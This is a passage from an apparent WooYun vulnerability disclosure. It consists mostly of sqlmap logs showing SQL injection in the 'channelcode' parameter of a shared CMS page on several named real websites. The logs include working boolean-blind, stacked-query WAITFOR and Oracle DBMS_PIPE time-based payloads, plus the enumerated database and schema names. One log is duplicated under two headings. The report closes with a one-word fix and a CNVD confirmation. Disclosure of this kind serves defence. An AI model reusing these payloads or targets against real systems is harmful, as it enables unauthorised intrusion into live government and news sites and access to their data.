Parameter: channelcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoid=1248400068052775&channelcode=A070202' AND 2045=2045 AND 'mMZ
u'='mMZu
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: infoid=1248400068052775&channelcode=A070202'; WAITFOR DELAY '0:0:5'
;-- AND 'RQfF'='RQfF
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: infoid=1248400068052775&channelcode=A070202' WAITFOR DELAY '0:0:5'-
- AND 'POVA'='POVA
---
[23:54:46] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[23:54:46] [INFO] fetching database names
[23:54:46] [INFO] fetching number of databases
[23:54:46] [INFO] resumed: 7
[23:54:46] [INFO] resumed: master
[23:54:46] [INFO] resumed: model
[23:54:46] [INFO] resumed: msdb
[23:54:46] [INFO] resumed: Northwind
[23:54:46] [INFO] resumed: pubs
[23:54:46] [INFO] resumed: shcms
[23:54:46] [INFO] resumed: tempdb
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] shcms
[*] tempdb
[23:54:46] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.zysy.org.cn'
[*] shutting down at 23:54:46


第五个

注入地址:http://en.heritagehuangshan.gov.cn/cms/cms/infopub/getclick.jsp?infoid=
1327237672677702&channelcode=A090404
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:20:57
[00:20:57] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\en.heritagehuangshan.gov.cn\session' as session file
[00:20:57] [INFO] testing connection to the target url
[00:20:58] [INFO] testing if the url is stable, wait a few seconds
[00:20:59] [INFO] url is stable
[00:20:59] [INFO] testing if GET parameter 'infoid' is dynamic
[00:20:59] [INFO] confirming that GET parameter 'infoid' is dynamic
[00:21:00] [WARNING] GET parameter 'infoid' appears to be not dynamic
[00:21:00] [WARNING] heuristic test shows that GET parameter 'infoid' might not
be injectable
[00:21:00] [INFO] testing sql injection on GET parameter 'infoid'
[00:21:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:21:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:21:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:21:06] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:21:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[00:21:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:21:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:21:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:21:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:21:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:21:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:21:15] [INFO] testing 'Oracle AND time-based blind'
[00:21:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:21:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:21:29] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[00:21:44] [WARNING] GET parameter 'infoid' is not injectable
[00:21:44] [INFO] testing if GET parameter 'channelcode' is dynamic
[00:21:44] [INFO] confirming that GET parameter 'channelcode' is dynamic
[00:21:45] [INFO] GET parameter 'channelcode' is dynamic
[00:21:45] [WARNING] heuristic test shows that GET parameter 'channelcode' might
not be injectable
[00:21:45] [INFO] testing sql injection on GET parameter 'channelcode'
[00:21:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:21:47] [INFO] GET parameter 'channelcode' is 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[00:21:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:21:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:21:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:21:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[00:21:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:21:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:21:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:21:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:21:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:21:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:21:50] [INFO] testing 'Oracle AND time-based blind'
[00:22:01] [INFO] GET parameter 'channelcode' is 'Oracle AND time-based blind' i
njectable
[00:22:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'channelcode' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
sqlmap identified the following injection points with a total of 183 HTTP(s) req
uests:
---
Place: GET
Parameter: channelcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoid=1327237672677702&channelcode=A090404' AND 8666=8666 AND 'PRY
I'='PRYI
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: infoid=1327237672677702&channelcode=A090404' AND 6514=DBMS_PIPE.REC
EIVE_MESSAGE(CHR(67)||CHR(83)||CHR(118)||CHR(79),5) AND 'UTvg'='UTvg
---
[00:22:06] [INFO] the back-end DBMS is Oracle
web application technology: JSP, Apache 2.2.16
back-end DBMS: Oracle
[00:22:06] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[00:22:06] [INFO] fetching database (schema) names
[00:22:06] [INFO] fetching number of databases
[00:22:06] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[00:22:06] [INFO] retrieved: 17
[00:22:11] [INFO] retrieved: CMSADMIN
[00:22:46] [INFO] retrieved: CMSNEW
[00:23:13] [INFO] retrieved: CTXSYS
[00:23:41] [INFO] retrieved: DBSNMP
[00:24:08] [INFO] retrieved: DMSYS
[00:24:32] [INFO] retrieved: EXFSYS
[00:25:00] [INFO] retrieved: MDSYS
[00:25:24] [INFO] retrieved: OLAPSYS
[00:25:56] [INFO] retrieved: ORDSYS
[00:26:25] [INFO] retrieved: OUTLN
[00:26:49] [INFO] retrieved: SCOTT
[00:27:12] [INFO] retrieved: SYS
[00:27:29] [INFO] retrieved: SYSMAN
[00:27:58] [INFO] retrieved: SYSTEM
[00:28:26] [INFO] retrieved: TSMSYS
[00:28:55] [INFO] retrieved: WMSYS
[00:29:19] [INFO] retrieved: XDB
available databases [17]:
[*] CMSADMIN
[*] CMSNEW
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[00:29:39] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 70 times, 500 (Internal Server Error) - 2 times
[00:29:39] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\en.heritagehuangshan.gov.cn'
[*] shutting down at 00:29:39


第六个

注入地址:http://www.sz-news.com/cms/cms/infopub/getclick.jsp?infoid=124062393138
1661&channelcode=A041502
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:22:32
[00:22:32] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.sz-news.com\session' as session file
[00:22:32] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from sessio
n file
[00:22:32] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: channelcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoid=1233390306515563&channelcode=A041502' AND 5432=5432 AND 'rEd
N'='rEdN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: infoid=1233390306515563&channelcode=A041502'; WAITFOR DELAY '0:0:5'
;-- AND 'daDA'='daDA
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: infoid=1233390306515563&channelcode=A041502' WAITFOR DELAY '0:0:5'-
- AND 'uASL'='uASL
---
[00:22:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.0.49, JSP
back-end DBMS: Microsoft SQL Server 2005
[00:22:32] [INFO] fetching database names
[00:22:32] [INFO] fetching number of databases
[00:22:32] [INFO] resumed: 5
[00:22:32] [INFO] resumed: master
[00:22:32] [INFO] resumed: model
[00:22:32] [INFO] resumed: msdb
[00:22:32] [INFO] resumed: szcms
[00:22:32] [INFO] resumed: tempdb
available databases [5]:
[*] master
[*] model
[*] msdb
[*] szcms
[*] tempdb
[00:22:32] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.sz-news.com'
[*] shutting down at 00:22:32


第七个

注入地址:http://en.heritagehuangshan.gov.cn/cms/cms/infopub/getclick.jsp?infoid=
1327237672677702&channelcode=A090404
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:20:57
[00:20:57] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\en.heritagehuangshan.gov.cn\session' as session file
[00:20:57] [INFO] testing connection to the target url
[00:20:58] [INFO] testing if the url is stable, wait a few seconds
[00:20:59] [INFO] url is stable
[00:20:59] [INFO] testing if GET parameter 'infoid' is dynamic
[00:20:59] [INFO] confirming that GET parameter 'infoid' is dynamic
[00:21:00] [WARNING] GET parameter 'infoid' appears to be not dynamic
[00:21:00] [WARNING] heuristic test shows that GET parameter 'infoid' might not
be injectable
[00:21:00] [INFO] testing sql injection on GET parameter 'infoid'
[00:21:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:21:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:21:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:21:06] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:21:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[00:21:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:21:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:21:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:21:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:21:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:21:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:21:15] [INFO] testing 'Oracle AND time-based blind'
[00:21:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:21:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:21:29] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[00:21:44] [WARNING] GET parameter 'infoid' is not injectable
[00:21:44] [INFO] testing if GET parameter 'channelcode' is dynamic
[00:21:44] [INFO] confirming that GET parameter 'channelcode' is dynamic
[00:21:45] [INFO] GET parameter 'channelcode' is dynamic
[00:21:45] [WARNING] heuristic test shows that GET parameter 'channelcode' might
not be injectable
[00:21:45] [INFO] testing sql injection on GET parameter 'channelcode'
[00:21:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:21:47] [INFO] GET parameter 'channelcode' is 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[00:21:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:21:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:21:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:21:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[00:21:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:21:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:21:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:21:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:21:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:21:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:21:50] [INFO] testing 'Oracle AND time-based blind'
[00:22:01] [INFO] GET parameter 'channelcode' is 'Oracle AND time-based blind' i
njectable
[00:22:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'channelcode' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
sqlmap identified the following injection points with a total of 183 HTTP(s) req
uests:
---
Place: GET
Parameter: channelcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoid=1327237672677702&channelcode=A090404' AND 8666=8666 AND 'PRY
I'='PRYI
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: infoid=1327237672677702&channelcode=A090404' AND 6514=DBMS_PIPE.REC
EIVE_MESSAGE(CHR(67)||CHR(83)||CHR(118)||CHR(79),5) AND 'UTvg'='UTvg
---
[00:22:06] [INFO] the back-end DBMS is Oracle
web application technology: JSP, Apache 2.2.16
back-end DBMS: Oracle
[00:22:06] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[00:22:06] [INFO] fetching database (schema) names
[00:22:06] [INFO] fetching number of databases
[00:22:06] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[00:22:06] [INFO] retrieved: 17
[00:22:11] [INFO] retrieved: CMSADMIN
[00:22:46] [INFO] retrieved: CMSNEW
[00:23:13] [INFO] retrieved: CTXSYS
[00:23:41] [INFO] retrieved: DBSNMP
[00:24:08] [INFO] retrieved: DMSYS
[00:24:32] [INFO] retrieved: EXFSYS
[00:25:00] [INFO] retrieved: MDSYS
[00:25:24] [INFO] retrieved: OLAPSYS
[00:25:56] [INFO] retrieved: ORDSYS
[00:26:25] [INFO] retrieved: OUTLN
[00:26:49] [INFO] retrieved: SCOTT
[00:27:12] [INFO] retrieved: SYS
[00:27:29] [INFO] retrieved: SYSMAN
[00:27:58] [INFO] retrieved: SYSTEM
[00:28:26] [INFO] retrieved: TSMSYS
[00:28:55] [INFO] retrieved: WMSYS
[00:29:19] [INFO] retrieved: XDB
available databases [17]:
[*] CMSADMIN
[*] CMSNEW
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[00:29:39] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 70 times, 500 (Internal Server Error) - 2 times
[00:29:39] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\en.heritagehuangshan.gov.cn'
[*] shutting down at 00:29:39

漏洞证明:

详细说明

修复方案:

过滤

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-08-04 10:36

厂商回复:

CNVD确认并复现所述情况,暂未能确认软件生产厂商,根据测试用例,已经转由CNCERT下发给对应分中心处置。

最新状态:

暂无